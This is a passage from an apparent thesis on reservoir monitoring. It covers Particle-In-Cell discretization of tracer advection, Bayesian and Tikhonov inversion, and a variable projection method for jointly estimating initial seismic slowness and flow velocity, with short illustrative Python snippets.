The tracer advection equation (Equation (2.3a)) can be discretized in a number of ways. One option is to use explicit Eulerian techniques such as up-winding, Lax-Wendroff or Lax-Friedrichs (Ascher et al., 2006). However, explicit techniques suffer from one main shortcoming: since the velocity of the equation is unknown, one has to monitor the time step to make sure stability is maintained. Monitoring and adjusting the time step can add enormous complexity to the optimization technique used when attempting to estimate the velocity. Methods such as up-winding and other flux limiters have another shortcoming: they are not differentiable with respect to the velocity, and therefore simple optimization techniques can run into difficulties. Alternately, one has the option of using implicit methods, which require the solution of linear systems at every time step, or of using semi-Lagrangian techniques.

Semi-Lagrangian techniques are particularly attractive for this application as they are explicit, unconditionally stable, and can easily be made differentiable. Semi-Lagrangian methods can suffer from low accuracy; however, for this application, where the velocity field is approximated and thus inaccurate, working with highly accurate discretizations is usually computationally wasteful. Therefore a Particle-In-Cell (PIC) method, which can also be interpreted as a semi-Lagrangian technique, is applied for the discretization.

The idea of using PIC methods for the solution of conservation laws is not new, and was proposed in Evans and Harlow (1957). Recently, PIC methods have emerged in computer graphics (Edwards and Bridson, 2012) and in flow in porous media (Roubinet et al., 2013).

To use PIC methods, a particle $x_j$ is associated with the midpoint of the $j$th grid cell. The particle is assigned a value $m_j = m_0(\vec x_j)$, and the advection of the particle $x_j$ is described by the following ordinary differential equation (ODE)

\[ \frac{\partial x_j(t)}{\partial t} = \vec u(x). \tag{2.6} \]

Using a midpoint quadrature rule, the particle's position after the first time step is approximated by

\[ x_j(t_1) = x_j(0) + \Delta t\,(A_{cf}\,u)_j + \mathcal O(\Delta t^2), \tag{2.7} \]

where $A_{cf}$ denotes an averaging operator from cell faces (where the velocity resides) to cell centers. Thus, the position of the particle at a later time is easily computed given a time step and a velocity field. Since the new position will in general not be the mid-point of a cell, the value $m_j$ is distributed to the closest surrounding points, as illustrated in Figure 2.4.
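Before continuing with the interpolation weights, the following is a brief sketch of how the discrete divergence of Equation (2.5) can be assembled with Kronecker products. It is an illustrative stand-in, not the thesis implementation: the short difference matrix here includes a $1/h$ scaling, and the grid sizes are arbitrary.

```python
# Assemble DIV of Eq. (2.5): maps face-centred velocities [u1; u2] to cells.
import numpy as np
import scipy.sparse as sp

def d_short(l, h):
    """Short finite-difference matrix in R^{l x (l+1)}, scaled by 1/h."""
    e = np.ones(l + 1)
    return sp.spdiags([-e, e], [0, 1], l, l + 1) / h

l1, l2, h1, h2 = 4, 3, 1.0, 1.0
D1 = sp.kron(sp.identity(l2), d_short(l1, h1))   # x-differences of u1
D2 = sp.kron(d_short(l2, h2), sp.identity(l1))   # y-differences of u2
DIV = sp.hstack([D1, D2]).tocsr()                # cell-centred divergence

# Sanity check: a constant velocity field is divergence free.
u = np.ones(D1.shape[1] + D2.shape[1])
print(np.abs(DIV @ u).max())                     # 0.0
```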
To compute the distribution weights, bilinear basis functions (bilinear interpolation) were used; however, higher order interpolation techniques can be, and have been, applied (Edwards and Bridson, 2012). Thus, the slowness field $m_k$ at time $t_k = t_{k-1} + \Delta t$ is given by

\[ m_k = T(\Delta t\, u)\, m_{k-1}, \tag{2.8} \]

where $T(\Delta t\, u)$ denotes the push-forward matrix containing the values of the bilinear hat functions associated with the particles at the grid points. Since the value of each particle is spread between neighboring cell-centers, this construction guarantees exact mass preservation as long as no flux exits at the boundaries of the computational domain. Using the push-forward matrix, the time-stepping process is then

\[ m_k = T(\Delta t\, u)\, m_{k-1} = T^k m_0. \tag{2.9} \]

The slowness at the $k$th time step is therefore a pushed-forward version of $m_0$, where the path the particle takes is piece-wise linear.

Figure 2.4: Particle-In-Cell method for the advection and mass-conservation equation. A particle located at the cell-centered point $\vec x_A$ on the regular mesh is pushed forward with velocity $\vec u$ along the path $\vec u\Delta t$, to the non-grid point $\vec x_B$. The value (mass) associated with the particle is then transferred to the cell centered grid points adjacent to $\vec x_B$ using interpolation weights.

2.5 Summary

This chapter presented the physical models selected to represent the geophysical imaging survey and the tracer advection fluid flow model for the reservoir monitoring experiment, discussed the relationship between the model physical properties, and detailed the discretization.

One novel and important result of the tracer advection model, discussed in Section 2.3, is that under certain conditions the "motion" of the seismic slowness is governed by the advection model. This result eliminates the need to know the petrophysical relationship between the tracer and the slowness, and will be beneficial when formulating the coupled inverse problems later in Chapters 3 and 4.

In addition, the discretization of the physical models was detailed; in particular, an explicit unconditionally stable Lagrangian technique was applied to discretize the tracer advection equation. Because the method is explicit and unconditionally stable, it will not add additional complexity to the inverse problems to be proposed.

Chapter 3
Error characterization and model estimation

Estimating either the seismic slowness or the fluid flow parameter functions, and later optimally designing the geophysical survey, requires the solution of an inverse problem. Before formulating the coupled inverse problem to estimate flow parameters, and developing an optimal experimental design method, it is important to understand the basis of a linear inverse problem from both the Bayesian and frequentist perspectives, and additionally, how the characterization of the error in the dynamic flow model affects the formulations.
The main goal of this chapter is to give the reader a quick background in linear inverse theory in preparation for the inverse problem developed in Chapter 4, and the adaptive optimal experimental design method developed in Chapter 5.

This chapter first presents a brief review of Bayesian linear inversion and its relationship to frequentist linear inversion, followed by two formulations of a coupled inverse problem that assume knowledge of the velocity field $\vec u$: one for the case where there is no noise in the flow model, and one for the case where there is random noise.

3.1 Linear inversion

The process of inferring model parameters from a set of noisy observations is commonly known as inversion, or parameter estimation. In this context it is assumed that, given a physical model and model parameters, observation data can be simulated by solving the forward problem. Thus, if one has some real observation data, then an estimate of the model parameters can be obtained by minimizing the difference between the simulated data (predicted data) and the observations.

Inverse problems can be thought of as statistical estimation problems that can be studied from both Bayesian and frequentist perspectives (Biegler et al., 2011; Stark and Tenorio, 2010). In either case, a stochastic model for the data is required, and constraints on the unknown model parameters can be incorporated. The major difference between the two perspectives is that Bayesian methods require that constraints be formulated as a prior probability distribution, whereas the frequentist methodology does not. An important and well known observation is that for a linear Tikhonov regularized inverse problem, with some simple assumptions, the two methodologies reduce to an equivalent problem. This result becomes important later, in Chapter 5, when the adaptive optimal experimental design of the ill-posed coupled problem is examined.

To begin a basic review of inversion, consider the dynamic process and measurement technique described by the following set of discrete linear equations describing the tracer advection (Equation (3.1a)) and the seismic tomography (Equation (3.1b)) presented in Chapter 2,

\[ m_k = T m_{k-1} + \eta_k, \tag{3.1a} \]
\[ d_k = F m_k + \epsilon_k, \tag{3.1b} \]

where the noise vectors $\eta_k$ and $\epsilon_k$ are assumed to be Gaussian, $\eta_k \sim \mathcal N(0, Q_k)$ and $\epsilon_k \sim \mathcal N(0, W_k^{-1})$. If the noise $\epsilon$ is uncorrelated, then the matrix $W$ is a diagonal matrix with entries $w_i = 1/\sigma_i^2$, where $\sigma_i$ is the standard deviation of $\epsilon_i$ away from zero.

Assuming for the time being that the goal is to recover only the geophysical model properties given geophysical data, without consideration of the dynamics, then the geophysical properties, or the slowness $m$ for the tomography experiment, given a travel time data set $d$, can be estimated by maximizing the Bayesian posterior likelihood of $m$ given $d$, which is proportional to the product of the probability of the data given the model and the model likelihood:

\[ P(m\,|\,d) \propto P(d\,|\,m)\,P(m), \]

where $m$ is a random variable with Gaussian prior distribution $m \sim \mathcal N(\mu, \Sigma)$.
Thus the probability of the model given the data is

\[ P(m\,|\,d) \propto \exp\!\left(-\tfrac12 (Fm - d)^{\top} W (Fm - d)\right)\exp\!\left(-\tfrac12 (m-\mu)^{\top}\Sigma^{-1}(m-\mu)\right). \]

Taking the negative log yields

\[ -\ln\big(P(m\,|\,d)\big) \propto \tfrac12 (Fm - d)^{\top} W (Fm - d) + \tfrac12 (m-\mu)^{\top}\Sigma^{-1}(m-\mu), \]

and minimizing with respect to $m$ gives

\[ F^{\top}W(Fm - d) + \Sigma^{-1}(m - \mu) = 0. \]

Finally, solving for $m$ yields the maximum a-posteriori (MAP) estimate

\[ \hat m = (F^{\top}WF + \Sigma^{-1})^{-1}(F^{\top}Wd + \Sigma^{-1}\mu). \]

Alternately, a common linear inverse problem for estimating the geophysical parameters $m$ from the frequentist perspective is given by the following regularized Tikhonov inverse problem (Hansen, 1998; Tikhonov and Arsenin, 1977),

\[ \min_m \tfrac12\|Fm - d\|^2 + \tfrac12\alpha\,\|L(m - m_p)\|^2. \tag{3.2} \]

The first term in Equation (3.2) penalizes the difference between the simulated data and the measured data, and the second term (the regularization term) is chosen to promote smoothness between the estimated model and a reference model $m_p$. The regularization term improves the convexity of the inverse problem, as the problem is ill-posed in the classical sense; without it, solutions will fit the measurement noise and are thus meaningless.

The choice of regularization is an interesting problem in itself, and is usually problem specific. There is much research in the area of optimally selecting and constructing regularization functionals, particularly in medical imaging (Hansen, 1998; Huang et al., 2012). Later, when developing the coupled inverse problem, specific care will be taken in constructing an appropriate regularization functional for reservoir parameter estimation.

Minimizing Equation (3.2) yields

\[ \hat m = (F^{\top}F + \alpha L^{\top}L)^{-1}(F^{\top}d + \alpha L^{\top}L\, m_p). \]

Note that if $L^{\top}L = \Sigma^{-1}$, $W = \tfrac{1}{\alpha} I$, and $m_p$ is considered the prior mean, then the two problems are equivalent. This well known fact will allow for the application of Bayesian optimal experimental design techniques to coupled inverse problems with linear regularization terms, discussed later in Chapter 5.

However, in order to couple Equations (3.1) to form a single inverse problem, the error $\eta_k$ in the dynamic model must be considered.

3.2 Coupled inversion and error characterization

Before combining Equations (3.1a) and (3.1b), there are two instances of the noise in the dynamics that must be addressed, which result in different coupled inverse problem formulations.

Assume first that the dynamics are exact, that is, $\eta_k = 0\ \forall k$. Such a scenario is often assumed in history matching (Oliver and Chen, 2010). In this case the dynamics are determined by the initial model $m_0$, which is estimated using the measurements for all times. The second instance refers to the case where $\eta_k \neq 0$, and therefore the models $m_1,\dots,m_k$ for all times are estimated from all available data.

3.2.1 Exact dynamics

Setting $\eta_k = 0$ and assuming the velocity field $u$ is known, the model at time $t_k$ can be written as a linear mapping of the initial model $m_0$, such that

\[ m_k = T(\Delta t\,u)\,m_{k-1}, \quad \text{or} \quad m_k = T(\Delta t\,u)^k\,m_0, \tag{3.3} \]

which can be written as the following linear system,

\[ \underbrace{\begin{pmatrix} I & & & \\ -T(\Delta t\,u) & I & & \\ & \ddots & \ddots & \\ & & -T(\Delta t\,u) & I \end{pmatrix}}_{=:A(u)} \underbrace{\begin{pmatrix} m_1 \\ m_2 \\ \vdots \\ m_n \end{pmatrix}}_{=:m} - \underbrace{\begin{pmatrix} T(\Delta t\,u) \\ 0 \\ \vdots \\ 0 \end{pmatrix}}_{=:B(u)} m_0 = 0. \tag{3.4} \]

In compact form the system is given by

\[ A(u)\,m - B(u)\,m_0 = 0. \]
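As a concrete check of this block structure, the following toy sketch (illustrative, not from the thesis) assembles $A(u)$ and $B(u)$ for an arbitrary sparse stand-in transport matrix $T$, and verifies that solving the block system reproduces plain time stepping $m_k = T m_{k-1}$.

```python
import numpy as np
import scipy.sparse as sp
import scipy.sparse.linalg as spla

M, n = 50, 6                                      # model size, time steps
rng = np.random.default_rng(0)
T = sp.diags([0.9, 0.1], [0, -1], shape=(M, M))   # stand-in push-forward
m0 = rng.random(M)

# A: identity with -T on the block subdiagonal; B: T in the first block row.
A = sp.identity(n * M) - sp.kron(sp.diags([1.0], [-1], shape=(n, n)), T)
e1 = sp.csr_matrix(([1.0], ([0], [0])), shape=(n, 1))
B = sp.kron(e1, T)

m = spla.spsolve(A.tocsc(), B @ m0)               # m = A^{-1} B m0

# Reference: march the dynamics forward explicitly, Eq. (3.3).
ref, mk = [], m0
for _ in range(n):
    mk = T @ mk
    ref.append(mk)
print(np.allclose(m, np.concatenate(ref)))        # True
```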
Thus it is possible to write the time evolution of the initial model $m_0$ in terms of the future models and the dynamics, such that

\[ m = A(u)^{-1} B(u)\, m_0. \tag{3.5} \]

The data measurements at each time are then given by

\[ d_k = F_k m_0 + \epsilon_k, \tag{3.6} \]

where $F_k = F\,T^k$, and, for the large system for all times,

\[ d = (I\otimes F)\,A(u)^{-1}B(u)\,m_0 + \bar\epsilon, \tag{3.7} \]

where $\otimes$ is the matrix Kronecker product, $d = [d_1,\dots,d_k]^{\top}$ and $\bar\epsilon = [\epsilon_1,\dots,\epsilon_k]^{\top}$.

The coupled linear Tikhonov inverse problem to estimate $m_0$, assuming that the dynamics are known, is then

\[ \min_{m_0} \tfrac12\big\|(I\otimes F)A(u)^{-1}B(u)\,m_0 - d^{\rm obs}\big\|^2 + \tfrac12\alpha\,\|Lm_0\|^2. \tag{3.8} \]

The case where the parameters governing the dynamics are unknown, that is, where the reservoir parameters and the velocity field are to be estimated, again results in a different formulation of the inverse problem. A new formulation for estimating these models is presented in Chapter 4.

3.2.2 Inexact dynamics

To address the case where the dynamics are inexact, the geophysical imaging and the tracer advection of $m_0$ are written for all times:

\[ Fm_0 - d_0 = \epsilon_0; \]
\[ Fm_1 - d_1 = \epsilon_1, \qquad m_1 - Tm_0 = \eta_1; \]
\[ \vdots \]
\[ Fm_k - d_k = \epsilon_k, \qquad m_k - Tm_{k-1} = \eta_k. \tag{3.9} \]

Collecting all equations in matrix form results in the following system,

\[ \begin{pmatrix} F & & \\ & \ddots & \\ & & F \end{pmatrix} \begin{pmatrix} m_0 \\ \vdots \\ m_k \end{pmatrix} - \begin{pmatrix} d_0 \\ \vdots \\ d_k \end{pmatrix} = \begin{pmatrix} \epsilon_0 \\ \vdots \\ \epsilon_k \end{pmatrix}, \tag{3.10} \]

\[ \begin{pmatrix} -T & I & & \\ & \ddots & \ddots & \\ & & -T & I \end{pmatrix} \begin{pmatrix} m_0 \\ \vdots \\ m_k \end{pmatrix} = \begin{pmatrix} \eta_1 \\ \vdots \\ \eta_k \end{pmatrix}. \]

Defining the transport matrix for all times as

\[ \mathcal T = \begin{pmatrix} -T & I & & \\ & \ddots & \ddots & \\ & & -T & I \end{pmatrix}, \]

with $\bar m_k = (m_0^{\top},\dots,m_k^{\top})^{\top}$, $\bar d_k = (d_0^{\top},\dots,d_k^{\top})^{\top}$, $\bar\epsilon_k = (\epsilon_0^{\top},\dots,\epsilon_k^{\top})^{\top}$, and $\bar\eta_k = (\eta_1^{\top},\dots,\eta_k^{\top})^{\top}$, the compact system is

\[ \bar d_k = (I\otimes F)\,\bar m_k + \bar\epsilon_k, \tag{3.11} \]
\[ \mathcal T\,\bar m_k = \bar\eta_k. \tag{3.12} \]

Assuming again that the velocity field $u$ is known, the most recent model $m_k$ is estimated by solving the following regularized minimization problem, which includes all historic data and the model estimates $m_0,\dots,m_{k-1}$,

\[ \hat m_k = \arg\min\ \tfrac12\big\|(I\otimes F)\,\bar m_k - \bar d_k\big\|^2_{W_k} + \tfrac12\big\|\mathcal T\,\bar m_k\big\|^2_{Q_k^{-1}} + \tfrac{\alpha}{2}\,\big\|(I\otimes L)\,\bar m_k\big\|^2_2. \tag{3.13} \]

A second option is to re-estimate all of the models given all current data; this is akin to minimizing over the full stacked vector $\bar m_k$. Writing the problem in this way, where the inverse problem minimizes both error vectors, is also known as Kalman smoothing (Aravkin, 2010; Evensen, 1994).

3.3 Summary

This chapter provided a brief review of linear inverse theory from both the Bayesian and frequentist perspectives, highlighted the relationship between the two methodologies for linear problems, and discussed the error characterization in the dynamic flow model.

Given the exact and inexact noise considerations presented, the main questions of the thesis can now be addressed. Chapter 4 considers the exact case and presents the formulation of the inverse problem for estimating both the initial state of the dynamic model, $m_0$, and the velocity field $\vec u$. Chapter 5 presents a new optimal design method, developed from the Bayesian perspective, for the frequentist coupled inverse problem. The design method is presented for both exact and inexact noise realizations in the dynamic flow model.

Chapter 4
Coupled inversion for velocity and initial slowness

In many cases in reservoir characterization, it is the hydraulic conductivity $K$ that is sought in order to forecast flow. For the tracer advection model, one might argue that this is not necessary, and that it may be a simpler problem to estimate the velocity field $u$. In particular, once the velocity field is known, and given an estimate of the initial slowness, the flow can be predicted by marching the model forward in time. This is the motivation for the approach detailed here.
Whereas the previous chapter outlined a method for estimating the initial slowness $m_0$ given seismic travel time data while the velocity field is assumed to be known, this chapter highlights a novel approach for estimating both $m_0$ and the velocity field $u$ from seismic tomography data, through a coupled inverse problem. This formulation assumes that there is no error in the dynamic flow model; that is, $m_k = T(u)m_{k-1} + \eta_k$, where $\eta_k = 0$.

The mathematical formulation developed in this chapter is similar to that of Section 3.2.1, with the exception that the velocity field is unknown. The resulting parameter estimation problem is posed as a flow constrained inverse problem with specifically tailored regularization functionals for both the initial model $m_0$ and the velocity field $u$. Following the discretization of the regularization functionals, the initialization and numerical optimization of the resulting non-linear inverse problem are discussed. The chapter concludes with a numerical example, where the initial slowness model and velocity field are recovered and used to forecast the flow of the tracer.

4.1 Flow constrained geophysical imaging

The formulation presented in Section 3.2.1 can be thought of as a flow constrained inverse problem for the case where the velocity field $u$ is known. In the case where one does not know the flow field, the following constrained problem can be solved to obtain estimates of both $m_0$ and $u$,

\[ \min_{u,\,m_0} \tfrac12 \sum_{j=0}^{k} \|F m_j - d_j\|^2 \tag{4.1a} \]
\[ \text{s.t. } m_k = T(\Delta t\,u)\,m_{k-1}, \quad m(0,x) = m_0, \quad \mathrm{DIV}\,u = q. \tag{4.1b} \]

Recall Equation (3.4), such that $m_k = T(\Delta t\,u)m_{k-1}$ can be written in matrix form for all times, in terms of the initial condition $m_0$, as $m = A(u)^{-1}B(u)\,m_0$. With the assumption that the dynamics are exact, i.e. the noise vectors $\eta_k = 0\ \forall k$, and that the data for all times are given by Equation (3.7), Equation (4.1) reduces to

\[ \min_{u,\,m_0} \tfrac12 \big\|(I\otimes F)A(u)^{-1}B(u)\,m_0 - d\big\|^2 \tag{4.2a} \]
\[ \text{s.t. } \mathrm{DIV}\,u = q. \tag{4.2b} \]

Minimizing Equation (4.2) under the flow constraints yields a velocity field and an initial slowness distribution that fit the tomography data. However, since both the tomography and flow estimation problems are ill-posed, regularization is needed. Here $R_{\rm flow}(\vec u)$ is defined as a regularization functional on the velocity field, and $R_m(m_0)$ as a regularization functional for the initial slowness.

To regularize the flow field estimation, the following continuous regularization functional for $\vec u$ is defined:

\[ R_{\rm flow}(\vec u) = \int_{\Omega} \alpha_1\,\phi(\nabla\times\vec u) + \frac{\alpha_2}{2}\,w(\vec x)\,|\vec u - \vec u_{\rm ref}|^2\; d\vec x, \tag{4.3} \]

where the first term penalizes the curl of the flow field and the second term seeks to minimize the difference between the recovered velocity, $\vec u$, and a reference velocity, $\vec u_{\rm ref}$. The parameters $\alpha_1, \alpha_2 > 0$ balance the contribution of both terms.

The choice to control the curl of the flow in the regularization was made because the divergence and the curl complement each other. Given that the divergence of the flow field is set by the constraint (4.1b), it makes sense to regularize only over its orthogonal complement. The penalty function $\phi$ was chosen by noting that sharp contrasts in the hydraulic properties of different rock units are common; for example, see the visualization of $\nabla\times\vec u$ in the left column of Figure 4.2.
Taking the curl of the velocity field $\vec u = -K\nabla p$, with $\nabla\cdot\vec u = q$, gives

\[ \nabla\times\vec u = -\nabla\times(K\nabla p) = \nabla p\times\nabla K, \quad \text{where } \|\nabla\times\vec u\| = \|\nabla p\|\,\|\nabla K\|\,\sin(\theta). \]

Thus, the curl of the flow field has tangential discontinuities where $K$ has jumps between rock types. For the most part the pressure gradient is parallel to $\nabla K$, except along the boundaries of rock types. For example, an aquifer might be surrounded by non-porous rock with zero hydraulic conductivity, and thus the cross product along that boundary will not necessarily vanish. Thus, assuming that $K$ is piecewise constant, the curl of the velocity is expected to be sparse.

The following convex approximation to the $\ell_1$-norm is applied to promote the sparsity of the curl of $u$,

\[ \phi(c) = \sqrt{c^2 + \epsilon}. \tag{4.4} \]

The reference model, $\vec u_{\rm ref}$, is included in order to incorporate prior information about the subsurface. The weighting function $w(\vec x)$ quantifies the confidence in $\vec u_{\rm ref}$; see (Oldenburg and Pratt, 2002). One option to compute $\vec u_{\rm ref}$ is by solving (2.3b) and (2.3c) using a reference conductivity model $K_0$ constructed from a priori borehole data. In this case, $w(\vec x)$ is large close to the boreholes and grows smaller as the distance from the known drill site grows.

It was mentioned in Section 2.2 that the diffusion term is not included in the advection-diffusion model. Because of this assumption, it is unlikely that the initial tracer model will have diffuse edges. Thus, smoothed Total Variation (TV) is used as the regularization to promote sharp edges in the estimated models (Ascher et al., 2006),

\[ R_m(m_0) = \beta \int_{\Omega} \phi(|\nabla m_0|)\; d\vec x. \tag{4.5} \]

Finally, the regularization parameters $\alpha_1$, $\alpha_2$ and $\beta$ should be selected such that the data misfit is approximately equal to the norm of the noise, a quantity that is in general unknown (Parker, 1994). Therefore, a cooling strategy is applied, starting with large regularization parameters that are then decreased incrementally until a reasonably small data misfit is achieved (see Section 4.6).

4.2 Discretization of regularization functionals

The discretization of the regularization functionals applies standard finite difference approximations of the partial differential operators on orthogonal staggered grids, following the discretization of the tomography experiment and the flow equations outlined in Chapter 2.

To discretize the curl of the flow field $\vec u$, Stokes' theorem is used,

\[ \int_S (\nabla\times\vec u)\cdot\hat n\; dS = \oint_{\Gamma} \vec u\cdot d\vec\Gamma, \tag{4.6} \]

where $\hat n$ is the unit normal vector to the surface $dS$, $\Gamma$ is the path around the surface, and $d\vec\Gamma$ is the infinitesimal path length.

The discretization of the curl operator follows (Haber and Ascher, 2001; Modersitzki, 2009), such that the discrete curl operator is defined by

\[ \mathrm{CURL} = \begin{pmatrix} -\,d^{\,l_2}_{l_2+1}\otimes I_{l_1} & \; I_{l_2}\otimes d^{\,l_1}_{l_1+1} \end{pmatrix}. \tag{4.7} \]

Here $d^{\,l}_{l+1} \in \mathbb R^{l\times(l+1)}$ is again a short finite difference matrix. Note that the CURL operates from the cell faces to the nodes. For a complete derivation of the matrices, see (Haber and Ascher, 2001; Modersitzki, 2009).

The integral in Equation (4.3) is discretized using a midpoint rule, resulting in the discrete regularization

\[ R_{\rm flow}(u) = \alpha_1 h^2\, e^{\top} A_{cn}\,\phi(\mathrm{CURL}\,u) + \frac{\alpha_2 h^2}{2}\,(u - u_{\rm ref})^{\top} W\,(u - u_{\rm ref}), \tag{4.8} \]

where the matrix $A_{cn}$ averages from nodes to cell-centers, $h$ is the cell length, and $e \in \mathbb R^M$ is a vector of ones.
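The following is a small numerical sketch of the discrete curl and the smoothed $\ell_1$ penalty of Equations (4.4) and (4.7)-(4.8). For clarity it uses direct array slicing on a staggered grid (curl evaluated at interior nodes only) rather than the Kronecker-product form, and the grid sizes and smoothing parameter $\epsilon$ are illustrative assumptions.

```python
import numpy as np

l1, l2, h = 8, 6, 1.0
rng = np.random.default_rng(1)

# Staggered (MAC) storage: u1 on vertical faces, u2 on horizontal faces.
u1 = rng.standard_normal((l2, l1 + 1))
u2 = rng.standard_normal((l2 + 1, l1))

# Discrete curl at interior nodes: d(u2)/dx - d(u1)/dy (short differences).
du2_dx = (u2[1:-1, 1:] - u2[1:-1, :-1]) / h    # shape (l2-1, l1-1)
du1_dy = (u1[1:, 1:-1] - u1[:-1, 1:-1]) / h    # shape (l2-1, l1-1)
curl = du2_dx - du1_dy

def phi(c, eps=1e-8):
    """Convex smoothed l1 approximation, Eq. (4.4)."""
    return np.sqrt(c ** 2 + eps)

# First term of Eq. (4.8) with alpha_1 = 1 (node-to-cell averaging omitted).
R_curl = (h ** 2) * phi(curl).sum()
print(R_curl)
```

Because $\phi$ approaches $|c|$ as $\epsilon \to 0$, this term behaves like an $\ell_1$ penalty on the curl, favouring velocity fields whose rotational part is concentrated along rock-unit boundaries, as argued above.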
Next, the regularization functional for the initial slowness is discretized. Noting that $m_0$ is discretized on a cell-centered grid, a standard discrete approximation of the smoothed total variation regularization is applied (Ascher et al., 2006),

\[ R_m(m_0) = h^2\, e^{\top} \sqrt{A_{cf}\big((\mathrm{GRAD}\, m_0)\odot(\mathrm{GRAD}\, m_0)\big) + \epsilon}, \tag{4.9} \]

where $\odot$ is the Hadamard product, and GRAD is a standard 2-point discretization of the gradient of a cell-centered variable, which maps from cell-centers to faces, as described in (Ascher et al., 2006; Haber and Ascher, 2001). $A_{cf}$ is an averaging matrix from cell-faces to cell-centers. Note that the notation is somewhat abused here, in that the square root of a vector is the point-wise square root.

Now that the regularization functionals have been established and discretized, the optimization methods are discussed in the following section.

4.3 Numerical optimization

In this section the approach to solving the flow constrained discrete optimization problem is outlined. A variable projection method is chosen to solve for the initial slowness and the velocity field in turn. Because the TV regularization is used for $m_0$, the objective function is non-linear with respect to $m_0$, and thus a primal-dual Newton method (Chan et al., 1999) is applied. To estimate $u$, an approximate Sequential Quadratic Programming (SQP) method is utilized (see Nocedal and Wright (2000) for further details).

The discrete form of the coupled variational optimization problem (4.2) for $u$ and $m_0$, with the discrete regularization functionals, is given by

\[ \min_{u,\,m_0} \tfrac12\big\|(I\otimes F)A(u)^{-1}B(u)\,m_0 - d\big\|^2 + R_{\rm flow}(u) + R_m(m_0) \tag{4.10a} \]
\[ \text{s.t. } \mathrm{DIV}\,u = q. \tag{4.10b} \]

There are a number of options for the solution of such problems. One option is to solve the problem directly with respect to $u$ and $m_0$. This approach has a number of disadvantages. First, it requires solving a large coupled problem where the parameters may have different scales. Second, it does not take advantage of the existing ability to solve the decoupled problems efficiently. Finally, solving the coupled problem requires the simultaneous evaluation of two regularization parameters. An alternate, more attractive option is to use a variant of the variable projection method (Golub and Pereyra, 2003). This method was applied successfully in (Chung et al., 2006) for solving the related super-resolution problem. Furthermore, it has been shown in (Chung, 2009) that it is possible to choose the regularization parameters for the different variables in the algorithm separately, thus decoupling the problem of selecting regularization parameters. The variable projection method, as applied to the tomography-flow optimization problem, is as follows.

First, assuming $u$ to be fixed, the conditions for a minimum with respect to $m_0$ are

\[ G(u)^{\top}\big(G(u)\,m_0 - d\big) + \nabla_{m_0} R_m(m_0) = 0, \tag{4.11} \]

where $G(u) = (I\otimes F)A(u)^{-1}B(u)$. In the standard variable projection method, where quadratic regularization is used, Equation (4.11) is linear with respect to $m_0$ and therefore can be solved directly. In this application the equation is nonlinear, due to the TV regularization applied to $m_0$. Nonetheless, it is possible to solve this problem rather quickly using, for example, a primal-dual Newton method (Chan et al., 1999).

Assuming that $m_0$ solves Equation (4.11), then $m_0 = m_0(u)$ and the optimization problem can be rewritten as a problem for $u$ alone,

\[ \min_u \tfrac12\|G(u)\,m_0(u) - d\|^2 + R_{\rm flow}(u) + R_m(m_0(u)) \tag{4.12a} \]
\[ \text{s.t. } \mathrm{DIV}\,u = q. \tag{4.12b} \]
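The mechanics of the variable projection elimination can be seen in a toy problem far simpler than (4.10): a classic separable least squares fit $y(t) = m_1 e^{-at} + m_2$, linear in $(m_1, m_2)$ and nonlinear in the decay rate $a$, which here plays the role of $u$. The sketch below (illustrative assumptions throughout; a small ridge term stands in for the TV and curl regularizers) solves the inner linear problem exactly for each candidate $a$, then minimizes the projected objective over $a$ alone, mirroring Equations (4.11)-(4.12).

```python
import numpy as np
from scipy.optimize import minimize_scalar

rng = np.random.default_rng(2)
t = np.linspace(0.0, 4.0, 60)
a_true, m_true = 1.3, np.array([2.0, 0.5])

def G(a):
    """Forward operator for fixed nonlinear parameter a (cf. G(u))."""
    return np.column_stack([np.exp(-a * t), np.ones_like(t)])

d = G(a_true) @ m_true + 0.02 * rng.standard_normal(t.size)
lam = 1e-6                                   # small quadratic regularizer

def project_m(a):
    """Inner solve, cf. Eq. (4.11): linear because the penalty is quadratic."""
    Ga = G(a)
    return np.linalg.solve(Ga.T @ Ga + lam * np.eye(2), Ga.T @ d)

def outer(a):
    """Projected objective, cf. Eq. (4.12): a function of a alone."""
    r = G(a) @ project_m(a) - d
    return 0.5 * r @ r

a_hat = minimize_scalar(outer, bounds=(0.1, 5.0), method="bounded").x
print(a_hat, project_m(a_hat))               # approx 1.3 and [2.0, 0.5]
```

As in the thesis formulation, the key point is that when the inner variable satisfies its own optimality condition, it can be treated as a function of the outer variable when differentiating the projected objective.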
Introducing the Lagrange multiplier $\lambda$, the Lagrangian $\mathcal L(u,\lambda)$ of the problem is

\[ \mathcal L(u,\lambda) = \tfrac12\|G(u)\,m_0(u) - d\|^2 + R_{\rm flow}(u) + R_m(m_0(u)) + \lambda^{\top}(\mathrm{DIV}\,u - q). \tag{4.13} \]

An important observation, made in (Golub and Greif, 2003), is that if $m_0$ solves the system Equation (4.11), then

\[ \nabla_u \mathcal L(u,\lambda, m_0(u)) = \frac{\partial \mathcal L}{\partial u} + \frac{\partial \mathcal L}{\partial m_0}\frac{\partial m_0}{\partial u} = \frac{\partial \mathcal L}{\partial u}, \]

because Equation (4.11) implies that $\partial\mathcal L/\partial m_0 = 0$, and thus $m_0$ can be treated as a constant in the objective function.

This observation leads to the following conditions for a minimum,

\[ J(u)^{\top}\big(G(u)\,m_0(u) - d\big) + \nabla_u R_{\rm flow}(u) + \mathrm{DIV}^{\top}\lambda = 0 \quad \text{and} \quad \mathrm{DIV}\,u = q, \tag{4.14} \]

where $J(u)$ is the Jacobian (sensitivity) of the data misfit term with respect to $u$. To compute the Jacobian, the misfit is rewritten as

\[ D(u) = \tfrac12\, r(u)^{\top} r(u), \quad \text{where } r(u) := (I\otimes F)A(u)^{-1}B(u)\,m_0 - d \ \text{ and } \ J(u) = \frac{\partial r}{\partial u}. \]

Using (3.4) to simplify the notation, and recalling the definition $m = A(u)^{-1}B(u)m_0$, the Jacobian is then

\[ \frac{\partial r(u)}{\partial u} = (I\otimes F)\,\frac{\partial m(u)}{\partial u}. \tag{4.15} \]

In order to differentiate $m$ with respect to $u$, Equation (3.4) is implicitly differentiated, yielding

\[ \frac{\partial (A(u)m)}{\partial u} + A(u)\frac{\partial m(u)}{\partial u} = \frac{\partial (B(u)m_0)}{\partial u}. \tag{4.16} \]

For the computation of the derivatives of $A(u)m$ and $B(u)m_0$, only the push-forward operator times the $i$th model, $T(u)m_i$, needs to be differentiated, for indices $i = 1,\dots,n$. These derivatives depend on the employed interpolation basis functions. Differentiating the product $T(u)m_i$ with respect to $u$ has been done in (Chung et al., 2006). Furthermore, since the interpolation matrix is sparse, the derivative matrices $\partial(A(u)m)/\partial u$ and $\partial(B(u)m_0)/\partial u$ are sparse.

